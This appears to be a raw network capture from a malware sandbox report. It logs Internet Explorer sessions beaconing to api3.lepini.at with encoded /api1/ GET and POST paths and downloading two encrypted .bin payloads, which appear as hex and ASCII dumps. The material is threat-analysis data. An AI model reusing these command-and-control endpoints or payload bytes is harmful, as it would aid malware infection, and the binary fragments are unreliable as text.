Nov 23, 2020 16:12:53.376292944 CET	5196	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
Nov 23, 2020 16:12:53.645526886 CET	5198	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49747	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:12:55.104048014 CET	5328	OUT	GET /api1/nN1Ol55DdZTF99NetjRWaAH/9IlAYH_2Bi/NJChWxmCySi4TCNdb/Hb2PMV9f9c1p/2JROzv82VEe/E5EE064uJn_2BN/5apynrqoBO2iUfsVr4ByT/GimjwbpQ_2BN0ESk/XFcgAwglRcD9XWW/i9wwZWDT3dc2fTMBWK/PmCwEjtPF/jcOKLZu2Kr6dC6y5yCqK/z4lWwCXRASbwMHnE8_2/F_2Bwn3gZ4jbDdhop6IMLA/VInxpv_2Fd5rb/qZil400K/ZBWMNFOBSvjT6i_2BS_0A_0/DcAMkhWaLG/_2F_2BmB9gSdFZbEM/3RTOybBlcMx_/2FWJEpANZJE7/DFY HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Host: api3.lepini.at
Nov 23, 2020 16:12:56.332869053 CET	5334	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:12:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49749	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:12:56.702212095 CET	5338	OUT	POST /api1/7gkQmt9ytyXiUUu/eKA3KxiWln9j2j10wD/wVPvUU48L/_2BiS_2Bb62v4aN_2F3V/75Fn32MNXkBomDExXol/3Pb8xO6WfnysvNA6s8ko8C/fkIKmEZq_2BvG/hyZi5ssg/pkfICryguuzMqzz0Acgij37/W6Qd84zkpW/daft2smXTJIdHoUZc/3s_2FvBVoMuz/PTXJ8XUF2iq/vIPUEqt_2BFkWq/SgvcxVBS96mCbA_2Bw_2B/OIGmgyiRvVjJm8I0/xdqEQ2vXnsTWUTA/BBEa1_0A_0DLxkfm7A/imaPnY7BH/K6T3oo6_2FTtR0c4LiJg/_2B57jESF6/9e165 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Content-Length: 2 Host: api3.lepini.at
Nov 23, 2020 16:12:56.702223063 CET	5338	OUT	Data Raw: 0d 0a Data Ascii:
Nov 23, 2020 16:12:57.723793983 CET	5339	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:12:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 33 0d 0a 82 01 5f 9d b3 21 07 31 c3 a8 24 ae a0 fa ef f0 b7 86 11 b6 b6 ca 48 cc 38 68 63 0f 4e ba 2c 3b 0e ba f5 ae 47 9e 90 a1 5a 58 f7 37 60 48 6e b9 c2 39 44 ba 8f 4f 43 53 da a8 87 66 85 d7 ce 16 e6 9d 0d 01 be ff 20 28 73 73 4d ba 39 23 1c 26 14 51 2b e7 37 ad 1f 04 86 09 79 9c ff b0 7f 16 03 5a 4f 4f 85 f0 8d bc 03 65 d6 e5 b4 78 55 8d af f3 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 73_!1$H8hcN,;GZX7`Hn9DOCSf (ssM9#&Q+7yZOOexU0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49750	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:12:58.049351931 CET	5340	OUT	GET /api1/a7X3wKrHBlCp0HYJPYF/jk9V6OkOof3C2RxlJ2_2Fs/jBqm5Ed5Au1Vf/h1anrt29/KsmpkCp_2F_2BFD_2FtezFN/RZDEry7Kqz/Wt5qRHzZA_2BmOlu4/KFMopUFfPYPj/xpsgjW2d3uR/5AaJI6t1vNy9Ny/vvWteODreeJH8A828HrjN/chdlkP8GqXv8ttX9/MIG_2BRH93knCfx/FHHCw0Q_2BdhIIZApq/bHbIsGhO6/VKb5IykC2rrBg6oz9ZT4/EJINWK2nI6i1Tk_2F3W/R_0A_0DvhtwXzfor9MIaPz/FncFikW4EM_2F/gQQoay3J9Z2Ql/YXe_2FRyh/b HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Host: api3.lepini.at
Nov 23, 2020 16:12:59.049961090 CET	5341	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:12:58 GMT Content-Type: application/octet-stream Content-Length: 332358 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="5fbbd17aaf530.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 5c b2 f3 38 3a 0a 3b 4e 3f 2e 9d 9f d3 4f 3a 9c da 97 a8 b5 ee 6f 1c a2 b0 bd fc 85 b7 34 cf 11 35 b0 f4 af 64 c4 51 8b ea c6 2b 8d c9 80 a4 79 47 03 63 3c 2f ec b3 4a d7 c4 47 35 d2 04 5a 32 16 94 9e b2 33 3c fd 31 99 73 19 96 9b b9 55 8f 96 ce bd 0c 6a 07 6c 24 b7 ee f5 9d 8a 35 48 e9 63 39 8c 5f b5 99 51 9e fc 37 0d 9f ef 49 cb d7 14 fb 58 bc 9f b0 41 df 77 76 ac fd 84 08 5c a1 31 83 ce 7e 03 29 dd 92 13 a8 04 93 94 06 7d c4 22 10 87 b6 19 f8 75 05 13 78 e1 6d 45 27 42 de c7 c5 2c 37 c4 5b e4 7a f8 1a 9b 8c d8 9d c9 c0 74 f7 c9 6d 18 82 26 72 20 c4 b8 01 4f 8e f9 79 84 3b 72 1d db f4 e2 c1 7a 67 cd c7 f8 cc a1 57 7f b0 76 f5 ce 2e 09 8b 31 f4 ab 9e b3 73 79 c5 83 43 04 cd 7d a3 43 1b b9 c0 9d 21 ff 5e cb dd f2 f8 09 68 0e 1a e0 6c 75 36 52 61 88 a3 91 67 e8 98 91 63 e6 e7 0e 42 83 1e d6 c9 c1 27 01 9d 80 06 5e 70 0b cb f8 f2 38 4c 23 77 82 ea 12 80 63 f9 01 e0 a9 d9 48 ad ab 9b aa 5f d7 19 df bb 7a 75 15 c6 70 58 0b c8 f7 41 a3 14 44 e4 3d ab 4e 0a b4 5c 68 c4 a6 13 9c 2b 64 92 b6 b1 73 26 d7 01 e0 7d 66 ec df 59 3a 44 c7 29 a6 a0 7e e7 08 05 7f c6 54 2a 12 be 8f 4f 06 51 33 65 f3 fe b1 3e be fc a7 07 a8 d7 f0 53 eb 1a 21 6f 50 45 69 c8 0e da 4f 92 f9 b3 a9 50 13 f1 bc 21 01 e6 b5 8a fc 87 30 13 9f bf d2 b9 a2 d8 79 9b b6 cb a5 65 d5 08 5b 6b ea dd 7c 00 58 89 04 41 25 89 18 b6 4c 9a c5 e7 cf 9e f6 11 a0 98 d3 c8 6d 75 82 b5 2d 48 74 dd a1 ed 65 40 73 e6 9f bb c1 31 58 6b 30 1c 1c 04 8d b7 2e af 75 f1 2c 71 8b 53 46 15 cc 8f 1c 82 a9 74 9a e8 14 7b ff dd e9 ef 04 a2 fb c3 db 58 df 18 a8 5b 45 44 e1 e6 18 35 3a a8 d3 74 a7 e4 96 bf e9 12 7e 9c 08 12 37 2e fe a6 aa 08 4e e1 b8 c5 e3 59 d1 62 a4 c2 0e 87 be 45 9c 79 7e ed 5d a8 4a 5f 6a 4b 00 d1 c8 a6 58 08 42 28 28 4a 00 08 93 2d f6 96 7b 01 e5 2e cd 28 a0 e1 56 da f1 dc cb dc 33 de 4f ef 07 9f 87 71 52 9a 13 10 b8 d0 bb 68 0b f7 06 a7 04 73 5a f0 0f 18 9d 0c f5 a6 22 db 90 31 c9 53 3e ba c3 e6 63 51 21 fb 08 a5 f8 f5 b0 34 0b 40 0f c5 b8 ee ab b0 be 1f df 45 3b 29 61 36 42 c7 1b f1 7c 51 bd b7 ec 9c 28 cf cf 64 2b a6 6f 1f 95 85 c7 4b 70 9d 07 74 ce 67 54 13 95 70 48 3b ac e2 e8 9b fa 5c bb eb 76 d9 c5 6b 7c c1 cf da b4 6d a8 6d b6 2d fc 82 f3 0b 88 eb 1c b7 19 24 37 e2 5f 55 86 27 50 fd e0 be 0f c4 45 65 2a 46 3d c4 9e 1c 8f 5a f4 9b e5 89 2d 38 92 d4 41 df 63 48 76 30 fb 96 f3 36 47 21 fb dd b8 0c 4f 61 bb 4d dd 78 0a 2b d3 68 a7 81 16 bc cc f1 a9 9e 41 d2 21 ab 72 73 54 10 fe c2 54 29 7f b1 e9 0e 7a c7 ba 71 b7 fa 5e 34 7f 0d 75 bf 62 6e 35 bc 70 bc 78 80 f0 ac 6b 0d dd 38 fb 7a d2 6c 84 53 c1 cb bc ca f2 71 22 1b 9f c0 0a 96 34 5b a1 88 28 a2 dc dd dc 5b 38 06 91 18 13 49 13 41 2b 19 12 fa 07 e7 21 2e ab af 3a 61 40 3a b1 d5 9f 57 36 21 41 2a 6c f1 1a cc 30 c1 a2 65 62 bb 11 29 ec 21 cb af 48 04 75 5f 4e 7b e6 17 89 6f fe c7 3d 82 67 46 5c Data Ascii: \8:;N?.O:o45dQ+yGc</JG5Z23<1sUjl$5Hc9_Q7IXAwv\1~)}"uxmE'B,7[ztm&r Oy;rzgWv.1syC}C!^hlu6RagcB'^p8L#wcH_zupXAD=N\h+ds&}fY:D)~TOQ3e>S!oPEiOP!0ye[k\|XA%Lmu-Hte@s1Xk0.u,qSFt{X[ED5:t~7.NYbEy~]J_jKXB((J-{.(V3OqRhsZ"1S>cQ!4@E;)a6B\|Q(d+oKptgTpH;\vk\|mm-$7_U'PEeF=Z-8AcHv06G!OaMx+hA!rsTT)zq^4ubn5pxk8zlSq"4[([8IA+!.:a@:W6!A*l0eb)!Hu_N{o=gF\
Nov 23, 2020 16:12:59.049995899 CET	5343	IN	Data Raw: 13 c7 a0 78 72 76 c1 5d 4d bb 14 88 73 8d 05 06 84 67 b9 9a 0f 00 ba d4 36 11 bb ac 4a 52 27 08 88 fc 56 ab aa d2 76 9b ee 19 c5 db 83 77 d5 a1 83 0e cd 1e d9 18 c6 47 c7 31 70 1f 88 ff e2 c0 5e 2b 33 34 74 af 12 0f e4 98 66 08 5f 90 a9 e9 ef f8 Data Ascii: xrv]Msg6JR'VvwG1p^+34tf_9U0_6zWtzS5]/26OfTm""!{oMx1umk(bR4q*="jBws+f>^dZk(YC^C]5ND
Nov 23, 2020 16:12:59.050019979 CET	5344	IN	Data Raw: b7 cf 44 29 9a e3 46 84 0f 24 e9 73 cb 93 96 81 be 93 54 f2 d1 f9 9b 26 a7 19 88 88 4f 34 34 bc a9 c9 77 cd 68 07 78 72 22 0d 76 dc c3 c3 b7 e8 a5 25 46 66 38 6b e3 ec 5f dc 1d 50 19 a9 d4 30 65 b9 72 61 03 d1 5f e4 00 66 f7 43 18 af 50 6a 1c d1 Data Ascii: D)F$sT&O44whxr"v%Ff8k_P0era_fCPjP=#B\|.]]5$dC\|V 6q~:k6N.$UV`NKH<a%'Z2<Zi=b_IN{'RnAXje%
Nov 23, 2020 16:12:59.050040960 CET	5346	IN	Data Raw: c5 8f f3 c9 da ee 7c 27 40 4a de de 71 2f 8f 36 f1 5a 05 a5 ce 15 5e c2 47 75 91 e2 ac f6 a4 74 fd 31 b0 f0 ee 60 34 b7 f4 25 dc 4b 87 e0 2f a4 0b b5 35 93 84 50 c1 bb 90 b4 98 3b 10 01 c4 dc d7 c9 97 64 40 57 d3 8b 9b b1 27 6f 70 63 7b 8e db 10 Data Ascii: \|'@Jq/6Z^Gut1`4%K/5P;d@W'opc{L,EkB* EXs2k=e0ls#!kq 8->Bd/pg2V;:?rhc<"c-IkMzH hNt^8A4F5xR$=O>qr
Nov 23, 2020 16:12:59.050064087 CET	5347	IN	Data Raw: 61 e8 10 32 47 fe 01 56 22 c1 b7 a9 93 25 6e a0 11 99 8d 89 2f a0 c6 de 93 f3 6f f7 2b 25 08 12 49 1a 2a 39 2c af fa af b0 7a 70 34 70 ae 23 28 a8 8f 5b 84 eb 5c 39 a7 3b 10 92 42 eb 23 ad ba e5 95 ab 1d 00 70 1d cd 3a e4 a7 3f 68 33 e5 b1 31 dc Data Ascii: a2GV"%n/o+%I*9,zp4p#([\9;B#p:?h31f\|G;[Q!h"wQWYx3g`jw@oLB?u+!<[B1zd4,{?.X<o8H-8TMCP$x)K+d`nw1gyed_LE]
Nov 23, 2020 16:12:59.050087929 CET	5348	IN	Data Raw: dd 80 46 23 3a e1 bc de 13 08 ea 4d 06 a0 3b 46 bd 30 bf cd 52 7e 24 90 06 cd 21 64 1b 21 60 7c cd 03 0a 8b b7 64 85 e1 73 8e fa 76 49 20 22 47 25 7d a5 f2 95 1c c7 cb b7 e3 92 eb 78 1d 8e c7 aa 3e 52 99 cd cb dd 09 2e 65 11 df 00 54 dd 2b a1 93 Data Ascii: F#:M;F0R~$!d!`\|dsvI "G%}x>R.eT+=".R{lMr1L w,7t_P#dd"1P(Ld2/$rJqY1t}%T]6#T\OdZiBEq
Nov 23, 2020 16:12:59.050112963 CET	5350	IN	Data Raw: 5c 1f 06 e2 0d bf ea ae c5 f9 b3 78 99 ce 54 4a 1f ce a8 09 54 18 11 47 0e 04 c1 4a 69 25 2f 94 08 b5 31 93 d4 e9 95 e8 b8 ef 58 bc d8 43 5a 89 14 90 23 92 4b 28 5e 6d d3 32 90 dc 20 b6 96 72 07 a7 5d 7a cf b0 8d 22 bb a1 58 68 8b c2 94 6f f7 4c Data Ascii: \xTJTGJi%/1XCZ#K(^m2 r]z"XhoL}.8SI?Bo0"x(/(\Jp`>n}wU>F'\tj#]j+P$BEfLD[MEwU6N<4AlgT-\|}-D
Nov 23, 2020 16:12:59.050141096 CET	5351	IN	Data Raw: 58 9c f1 19 81 6a 73 ec 98 e9 67 3d 7a b8 ed be 1a 55 e8 fb 90 b1 9b 40 7e 9a f3 3b 1a 1a 14 97 5b c5 fb a4 1f ff 58 30 87 39 18 20 23 07 62 c1 ad 4e 8f 50 fa f3 c9 d0 ac 12 c4 c7 36 48 71 c0 3c d3 a3 08 e0 b3 2e a4 31 86 e3 c0 de 9c 38 9f 4c 02 Data Ascii: Xjsg=zU@~;[X09 #bNP6Hq<.18LXn5NTwKpIDe~o*U,(tI\bx&0BO{V}\|yPjR\|aR93nMu6i-wqE$O9" /_1/]H
Nov 23, 2020 16:12:59.050168991 CET	5352	IN	Data Raw: 56 57 e3 ba b5 b6 70 e7 e2 8f 25 ce c0 5f c0 60 30 41 39 e8 f6 a1 11 0c c7 52 e9 99 b1 91 dd 57 e9 9a 5b cd 88 24 99 e6 b5 fd bd db a1 7f 35 bd 0d 35 24 7a a9 81 2e b3 ab 8f 79 73 73 74 ad 3b 29 7c a6 64 df 3d 58 9b 99 4e 15 3f 76 a1 88 06 9a 16 Data Ascii: VWp%_`0A9RW[$55$z.ysst;)\|d=XN?v;7S rN<+gZ%iinH\:L}^G`2s:fyjpo3@gc#@D$uoiN5tN>~-l&<{#J2y
Nov 23, 2020 16:12:59.050192118 CET	5354	IN	Data Raw: 24 6d 4f fa 88 d1 25 8a 37 30 7f 09 44 fd c8 f5 99 65 17 0c 37 49 41 cc 1b e8 16 b6 b9 74 b3 09 b5 d9 3f 6a d6 f0 2c d9 a0 a9 4b fb a9 a4 ad 9b 17 19 d0 15 cb aa 0b fa 3d ea ee af 1b ea db 00 c0 db df b5 b9 88 e9 db f3 d1 82 3f b8 b8 92 ba b1 ee Data Ascii: $mO%70De7IAt?j,K=?=7U+u8qc3HgvvAuR%>eO9\]AoN{R(Y5\Ux2b\W\|btnwjeQhk;3$UlUK~NrCS->d"(K`e;y
Nov 23, 2020 16:12:59.311817884 CET	5357	IN	Data Raw: 59 44 8c fb 01 41 b4 0c a5 a4 a2 56 ea 4a 26 b1 5d e0 78 66 6f 35 14 c9 e0 ad 60 7d 9f ee 08 1c 79 b7 ed af e9 00 40 4c 05 bc b8 bb 6a df 68 f4 fb cb f0 b4 07 98 e4 35 db f2 d8 da 8b c6 35 ff 76 a7 b5 ed ba 92 cb f5 7f 90 4b 66 d9 88 c3 cd 98 8f Data Ascii: YDAVJ&]xfo5`}y@Ljh55vKf"1S5bJSr___Qehd_UjS~Or-w>c7{5730H6Au}Wh`Oi EZF.ap(rt=ly~t.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49752	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:13:01.885154963 CET	5696	OUT	GET /api1/4sKGcNWqFHVLKZ/2BTUgUaompfmLz2qEm5Tx/OfFGVs64GaPmABpi/ZxL5WlDeDM7x6hL/BCAh7voGMSUk50JM4D/95dysEGuf/8_2FLzWVldxgWdcK_2BS/cgiU1UY8ocTit7FNjj3/yZIMmxb8t97EcWPqxfbq9x/XAon_2Fklf9lH/UaIo5Tfo/segWplJOjJrpFm3wN5NNlmZ/JoENouc151/2TgqsBaQK3k6BgA4E/PfxzEf7mqqdI/Fz9ElsLTgix/zC7Cgey64u_0A_/0DDmG0Q1ZrBLICXpHTs79/K68kaHn_2B2VZwcW/kpiiM8xpuwmXYmB/_2BIh_2B9AOz7RozN2/QYOBBG HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Host: api3.lepini.at
Nov 23, 2020 16:13:02.882647991 CET	5697	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:13:02 GMT Content-Type: application/octet-stream Content-Length: 467014 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="5fbbd17e7f17c.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: ac ea 4f e1 d3 05 c3 68 dc f3 61 e5 d3 0c 65 31 b7 f8 7c dc 14 53 8a be 7e 89 cc 04 d4 d8 cb e2 cc 9d 09 38 ed 9e 8e 05 d8 2c 30 f6 71 ef 73 bd cd 1f 8c 51 03 f2 8f c9 01 e4 1b c3 99 68 93 74 74 0b e6 ba d9 a1 0d 7a 5b 60 1f ca e9 89 eb d3 dc cf 70 48 79 d9 6f a0 bf 9f 98 bc 6c d1 56 5f 7c 86 8e 72 5b b6 93 ae 06 9f 69 c3 1f 88 65 93 8c 81 4c 79 46 7d 35 17 cc 1f af d2 f0 47 aa f3 67 44 9a c2 60 30 39 dc de 34 67 4f 8f 9e 3a 39 6f 11 ba 62 42 85 b8 73 dc 24 77 f0 3b 6d 59 cf e2 0d 02 f8 76 24 36 32 36 d1 a5 00 93 32 9f 35 c1 ee e0 9c 04 f8 02 f3 6d b8 ab 97 3f e1 a6 81 5f e8 fb 83 3a 09 07 06 ae c7 0b 34 ae d4 1f 48 a3 73 db 26 b0 fd f5 02 0e 56 c9 b2 27 af b1 4d 76 1f 85 3c af 46 ca c7 2a 66 9e 66 22 ac 4d a8 1d 21 e4 2a 7f e2 50 45 bf 35 7a 00 3c 6e 4a fb 79 79 d2 9f 4b d3 0d da 41 b9 7d 33 cb 6e 72 4d d6 d3 3a a5 bd 03 77 c6 d4 c9 dc cb b7 ba 43 ca 2c 22 d0 4e 2c a9 75 31 bc bb d6 50 b5 7a 03 f4 03 eb 36 c8 3e 96 a4 6d fb c4 92 7e 0c 6f 57 2e 01 43 ac 75 e1 3c 71 32 c5 67 f8 8e 42 16 25 6f ca 77 e9 ac 91 e9 a9 49 44 39 fe 0d 72 b7 3b 47 96 16 e4 42 4c d9 4f d6 ba 77 be 6f d8 8a 17 9b cb f9 39 8a 73 50 08 7f de b4 31 e7 cc a8 48 f6 d7 c9 07 50 6c 38 ae 88 79 f6 6b 2a ce bf 94 68 de b9 22 3e 6c cd 41 99 e3 b8 94 53 4d 71 4c 5a c9 d5 fc 42 60 cd 08 1e 86 a2 c9 b3 16 bf 7d 09 3c 37 03 9a 3f cc 92 dd f1 ea 68 ba d9 9d 68 4a ec 97 2d 48 42 56 8f 96 16 54 4f 6a 22 06 68 26 16 e4 99 63 bf db 26 9f fe 2b aa 63 52 25 cc a4 c6 87 06 44 92 76 51 8f b8 50 b8 9c 2f 07 4f 2f 0b d3 6e 48 20 2d b5 8f a8 c1 02 bb f5 cf fd 2a 7e 49 59 86 90 41 d2 05 8b 26 ff 9f 6b e6 6c f5 81 44 45 53 d6 50 0e 46 c6 ce 1b ab 9f 4b 2b df 26 09 20 b3 42 b3 7f 02 9f aa f3 f4 ca 33 0f 07 14 e2 1e 60 fc c2 47 16 18 42 8a f0 90 95 2f 16 bb 7b 30 c1 90 3b 24 6c 7d 18 d2 19 ca cc 3d 62 09 83 ac 1a 0d 1c 66 1d c0 8a 58 ce 2e af 55 97 79 cf df 97 a7 c1 ad bc 24 e8 d5 68 a2 7e ff ed 7f 72 64 5e 5e e1 eb 0e a0 d3 9d 7b ec 35 02 ff 49 39 cb 86 b5 7d 05 0f 98 40 c9 cf e1 3c a5 42 40 28 66 64 97 d8 ab 18 1d 95 f8 b8 89 36 0b 63 3e 00 4c c5 2e c1 cc fa 74 41 b3 28 e2 b3 56 de 82 3a 3b 48 1d 88 0a bd 76 24 59 67 62 d0 12 c3 48 3b cd b7 90 8a fe a7 b6 85 c6 ec 08 2c ba b3 b3 97 54 98 70 0a f6 b9 72 22 63 c9 b5 41 26 7d a2 b8 af f3 3f f8 4f ce 5a 86 bd c6 22 a9 fc c0 cb 15 13 91 d8 08 71 6a ee 0b 04 07 2b 80 06 dc f0 09 b8 10 93 64 85 29 54 39 55 4c c0 c9 76 8d be f7 9b 84 6f fd e9 10 1b b0 80 23 72 ab ef f4 5d de 25 47 c8 2c 86 6f 67 6d 05 74 5d a9 85 ef 6f 8f 49 4b 47 47 47 99 72 51 9f 52 1c c8 83 3b 9c 88 7a 33 06 27 6c e3 ee b2 98 1e 55 fc 15 c1 68 4f 95 e8 0b 34 83 a9 35 a4 3c 62 3b f2 5e 9b fe d6 c3 17 c6 ed bc 98 fd 3e e0 d1 7c 8a a0 43 8b f9 a2 c3 d5 61 b2 09 43 ab 36 ed a6 39 9f 0a df ab 6e 13 0c 13 2e 1d ad ec e1 2c c4 3f ae 2c df 6a 45 Data Ascii: Ohae1\|S~8,0qsQhttz[`pHyolV_\|r[ieLyF}5GgD`094gO:9obBs$w;mYv$62625m?_:4Hs&V'Mv<Fff"M!PE5z<nJyyKA}3nrM:wC,"N,u1Pz6>m~oW.Cu<q2gB%owID9r;GBLOwo9sP1HPl8ykh">lASMqLZB`}<7?hhJ-HBVTOj"h&c&+cR%DvQP/O/nH -~IYA&klDESPFK+& B3`GB/{0;$l}=bfX.Uy$h~rd^^{5I9}@<B@(fd6c>L.tA(V:;Hv$YgbH;,Tpr"cA&}?OZ"qj+d)T9ULvo#r]%G,ogmt]oIKGGGrQR;z3'lUhO45<b;^>\|CaC69n.,?,jE
Nov 23, 2020 16:13:02.882669926 CET	5699	IN	Data Raw: 35 a6 34 0e d9 a4 af db bf 85 8d b8 6e 25 ef 40 8b a3 13 2d d6 15 84 cd 74 17 fa f7 f7 e7 51 78 ce 54 36 f4 56 bf 55 95 d6 c3 8f 8a f7 2f f9 b3 c2 77 1c 90 0a 3b f3 9a 30 48 c8 b8 c9 f5 5b ad 2a b6 22 e0 e3 54 36 e6 a0 5a 18 92 0a 53 61 4c 30 7b Data Ascii: 54n%@-tQxT6VU/w;0H["T6ZSaL0{AYhf1phhS~\nB5?/d5j: KP3.NHZ!!w#?`Pv+J3B{R`pL[hz#d6(mw:2h!eO
Nov 23, 2020 16:13:02.882687092 CET	5700	IN	Data Raw: 3d 28 33 90 e2 9c a0 75 58 98 78 62 f6 ad 81 72 b8 1a 0a 89 c5 d4 f2 38 02 c5 44 ff bc b2 e8 71 63 b0 15 c0 61 ae 8a e3 83 5a 12 a2 78 4b 46 d4 ed 33 df fe 17 93 79 f2 5d 78 bf d4 95 95 3a c3 9c 78 c6 60 18 7c 95 b6 a3 f2 8b 64 6d a0 9c 36 96 09 Data Ascii: =(3uXxbr8DqcaZxKF3y]x:x`\|dm6rpsC/3)N4O+E7rB40/,%`$`Sm9T"z3N-o%,\&88*$i@8:Jq
Nov 23, 2020 16:13:02.882709026 CET	5701	IN	Data Raw: d3 bf 09 fd d8 ec 38 da f9 b6 c0 b9 8f 1a 42 70 76 46 d6 58 7c 6e ca 61 f5 71 68 0d 01 22 29 1a 4f 53 39 42 29 0a ab 91 9f 10 03 95 13 37 93 49 e3 fe 2e d8 ff 77 94 55 a0 08 78 e3 59 7a 45 57 a3 f3 12 6e 4c b4 6d 2b 0b 05 84 b5 0e a6 b8 be 8f f2 Data Ascii: 8BpvFX\|naqh")OS9B)7I.wUxYzEWnLm+i-mq1?@s%eAX)k}~\|3"hCKUo{#.1Sw/v?Ms_}88`lrZ]W}\|*ydFj@wP}
Nov 23, 2020 16:13:02.882725000 CET	5703	IN	Data Raw: 7c f5 b7 aa a3 02 16 12 ba dc 63 c5 ce 0a ec e3 fa a3 c0 74 ad 1b 9e 02 1c bd 6d 6b e2 d4 5a 87 f4 eb 61 93 26 10 0e d8 f4 ce 8a 0d 6e 78 eb 24 6e 2d 27 81 18 1c 81 85 83 75 24 c2 ee 21 0b 3c 8a a2 a0 11 15 65 8d c6 ea 0e 93 10 18 cd 04 96 d0 0e Data Ascii: \|ctmkZa&nx$n-'u$!<e32z!}`\~OVs$JTj56+f\pqef)eY[wyb\{^2>yFrZ%+5Ew;nKX7M@M'4s)\2J;PT1fX\R=!.WL
Nov 23, 2020 16:13:02.882747889 CET	5704	IN	Data Raw: 5e e0 01 3a d8 be 31 dd 72 48 44 ba b3 82 04 c6 bd f7 56 8b 3d cb 87 59 de 31 10 bb de 2a 32 4a 78 34 61 83 a1 57 64 2a d8 8a 6d 78 98 2a a5 5b a8 52 40 b8 76 6c 47 7b a2 db ea 70 08 96 02 c3 b7 5c 01 ac f9 c4 fd 85 5b 78 4b 80 65 b1 b2 07 eb e0 Data Ascii: ^:1rHDV=Y12Jx4aWdmx[R@vlG{p\[xKeB=;\|(+d3alhZGhUasJ,^Rn9"m%U0SzJG\|jeb+AyvR[d&/Ey1tK{rZBPW;FL\|
Nov 23, 2020 16:13:02.882766962 CET	5706	IN	Data Raw: 6a f1 15 56 9f 4b 6c 64 d1 7b 3b 7c 35 12 c3 39 6c 97 cf 93 e4 05 ae 20 21 26 c2 b5 27 56 2f 05 b8 a1 7b 4e cb 09 01 ff 70 f4 3b a7 2d f5 d2 8f 7f f6 fe c2 79 de 05 a1 14 5a 3f b4 85 45 9f 6e 78 5d 44 b6 f7 70 84 a5 ab a4 42 46 fd 90 03 67 55 7f Data Ascii: jVKld{;\|59l !&'V/{Np;-yZ?Enx]DpBFgUo$S[E?N>37_.}h=FlOz4),m<f=qEXOo&cVaRx[uM,Ykl:mt]&pB6aY(#Ev*"]iFT-
Nov 23, 2020 16:13:02.882783890 CET	5707	IN	Data Raw: 7f d2 a0 64 16 84 47 0b 2e bb 4b 63 49 e8 87 1a f3 69 3f 38 14 e5 34 11 4a be 1f cc 2f b4 48 1e b9 be 2b e0 8a 5e bc e0 0a 01 0f a3 f3 32 6b ff 84 81 b9 dc 7f db 16 08 c5 35 56 91 a4 8f 70 57 9c 03 59 19 4c a9 b2 6e 01 cb 75 84 32 fa 34 c8 b4 3c Data Ascii: dG.KcIi?84J/H+^2k5VpWYLnu24<e2o/;Fe*2m3[uJ6<;bl=?D]eTUgwk"LQS`c#kJ923:rZ4bD-U7_[PRs]_8]
